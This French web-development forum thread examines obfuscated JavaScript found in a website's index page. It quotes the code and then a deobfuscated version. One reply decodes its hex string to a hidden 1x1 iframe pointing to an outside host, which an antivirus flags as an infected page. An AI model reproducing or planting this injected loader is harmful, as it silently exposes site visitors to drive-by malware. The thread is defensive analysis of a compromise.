IdentifiantMot de passe
Loading...
Mot de passe oubli� ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les r�ponses en temps r�el, voter pour les messages, poser vos propres questions et recevoir la newsletter

JavaScript Discussion :

qu'est ce que ce code javascript ?


Sujet :

JavaScript

Vue hybride

Message pr�c�dent Message pr�c�dent   Message suivant Message suivant
  1. #1
    Membre averti
    Inscrit en
    Juillet 2002
    Messages
    36
    D�tails du profil
    Informations forums :
    Inscription : Juillet 2002
    Messages : 36
    Par d�faut qu'est ce que ce code javascript ?
    Bonjour

    un code javascript est pr�sent dans le fichier index.htm d'un site web
    Le code ci-dessous g�n�re une alerte antivirus lors du chargement de la page.
    Je ne comprend pas comment fonctionne ce code et comment le "d�coder".

    je voudrais savoir si c'est un vrai piratage ou une fausse alerte et � quoi correspond le script.

    comment faire ?

    Merci

    Code : S�lectionner tout - Visualiser dans une fen�tre � part
    1
    2
    3
    4
    function EBF5831D5ABA9073AFCF9B84E71(EB39726F24D5A9E40016C0D17F159BDE)
    {var DDFC3D2A16632D81A4DFB=16;return(parseInt(EB39726F24D5A9E40016C0D17F159BDE,DDFC3D2A16632D81A4DFB));}
     
    function FE3A897E6F3F1BD7458ADEC2018E6F(E22853B48452875205017F8FE8C){var BDDE003A7780827909AAA0847A1CAB32=2;var AC9F95E8780CE2D3701BF="";for(D12BA9367CD678AD0F2FB59413735=0;D12BA9367CD678AD0F2FB59413735<E22853B48452875205017F8FE8C.length;D12BA9367CD678AD0F2FB59413735+=BDDE003A7780827909AAA0847A1CAB32){AC9F95E8780CE2D3701BF+=(String.fromCharCode(EBF5831D5ABA9073AFCF9B84E71(E22853B48452875205017F8FE8C.substr(D12BA9367CD678AD0F2FB59413735,BDDE003A7780827909AAA0847A1CAB32))));}document.write(AC9F95E8780CE2D3701BF);}FE3A897E6F3F1BD7458ADEC2018E6F("3C696672616D65207372633D22687474703A2F2F6261316F6E2E696E666F2F73706C222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");

  2. #2
    Membre Expert
    Avatar de RomainVALERI
    Homme Profil pro
    POO�te
    Inscrit en
    Avril 2008
    Messages
    2 652
    D�tails du profil
    Informations personnelles :
    Sexe : Homme
    �ge : 48
    Localisation : France, Meurthe et Moselle (Lorraine)

    Informations professionnelles :
    Activit� : POO�te

    Informations forums :
    Inscription : Avril 2008
    Messages : 2 652
    Par d�faut
    C'est du code g�n�r�, ou m�me plus probablement du code "obfusqu�" pour cacher sa fonction r�elle : il y a en effet une possibilit� pour que ce code soit malveillant, mais comment le savoir sans conna�tre comment ces variables sont aliment�es... ? ^^
    En tout cas ce code ne peut faire aucun mal tant qu'il n'est pas appel� depuis une page ou un autre js...

  3. #3
    R�dacteur/Mod�rateur

    Avatar de SpaceFrog
    Homme Profil pro
    D�veloppeur Web Php Mysql Html Javascript CSS Apache - Int�grateur - Bidouilleur SharePoint
    Inscrit en
    Mars 2002
    Messages
    39 659
    D�tails du profil
    Informations personnelles :
    Sexe : Homme
    �ge : 75
    Localisation : Royaume-Uni

    Informations professionnelles :
    Activit� : D�veloppeur Web Php Mysql Html Javascript CSS Apache - Int�grateur - Bidouilleur SharePoint
    Secteur : Industrie

    Informations forums :
    Inscription : Mars 2002
    Messages : 39 659
    Billets dans le blog
    1
    Par d�faut
    avec un paquet de replace tu peux t'amuser � remplacer les variable pour eclaircir un peu le code
    en commen�ant par les plus longues
    Ma page Developpez - Mon Blog Developpez
    Pr�sident du CCMPTP (Comit� Contre le Mot "Probl�me" dans les Titres de Posts)
    Deux r�gles du succ�s: 1) Ne communiquez jamais � quelqu'un tout votre savoir...
    Votre post est r�solu ? Alors n'oubliez pas le Tag

    Venez sur le Chat de D�veloppez !

  4. #4
    Membre �prouv�

    Profil pro
    Inscrit en
    F�vrier 2008
    Messages
    77
    D�tails du profil
    Informations personnelles :
    Localisation : France, Vienne (Poitou Charente)

    Informations forums :
    Inscription : F�vrier 2008
    Messages : 77
    Par d�faut
    Je trouve ceci :
    Code : S�lectionner tout - Visualiser dans une fen�tre � part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
     
    function fct1(param1)
    {
    return(parseInt(param1,16));
    }
    function fct2(param2)
    {
    var v1 = 2;
    var v2 = '';
    for(i=0;i<param2.length;i+=v1) {
       v2+=(String.fromCharCode (fct1(param2.substr(i,v1))));
       }
    document.write(v2);
    }
    fct2("3C696672616D65207372633D22687474703A2F2F6261316F6E2E696E666F2F73706C222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");
    Ce qui fait reagir mon antivirus: virus de script HTML/Infected.WebPage.Gen
    Je n'ai pas execut� le code mais si je converti la chaine transmise � la fct2 d'HEX en ASCII j'obtiens :
    <iframe src="http://ba1on.info/spl" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

  5. #5
    R�dacteur/Mod�rateur

    Avatar de SpaceFrog
    Homme Profil pro
    D�veloppeur Web Php Mysql Html Javascript CSS Apache - Int�grateur - Bidouilleur SharePoint
    Inscrit en
    Mars 2002
    Messages
    39 659
    D�tails du profil
    Informations personnelles :
    Sexe : Homme
    �ge : 75
    Localisation : Royaume-Uni

    Informations professionnelles :
    Activit� : D�veloppeur Web Php Mysql Html Javascript CSS Apache - Int�grateur - Bidouilleur SharePoint
    Secteur : Industrie

    Informations forums :
    Inscription : Mars 2002
    Messages : 39 659
    Billets dans le blog
    1
    Par d�faut
    pinaise vous m'en faites une bande d'antihackers asthmatiques ^^

    essaye juste de remplacer le document.write par un alert tu comprendras vite ...
    Ma page Developpez - Mon Blog Developpez
    Pr�sident du CCMPTP (Comit� Contre le Mot "Probl�me" dans les Titres de Posts)
    Deux r�gles du succ�s: 1) Ne communiquez jamais � quelqu'un tout votre savoir...
    Votre post est r�solu ? Alors n'oubliez pas le Tag

    Venez sur le Chat de D�veloppez !

+ R�pondre � la discussion
Cette discussion est r�solue.

Discussions similaires

  1. Est ce que ce code est optimis�.
    Par Andry dans le forum Langage
    R�ponses: 4
    Dernier message: 13/03/2009, 22h06
  2. Est ce que ce code est correct ?
    Par foot.c dans le forum D�buter
    R�ponses: 6
    Dernier message: 12/05/2008, 01h49
  3. R�ponses: 1
    Dernier message: 08/02/2007, 09h11
  4. [Dates] calcul de date est ce que mon code est bon?
    Par carmen256 dans le forum Langage
    R�ponses: 2
    Dernier message: 09/06/2006, 11h30

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo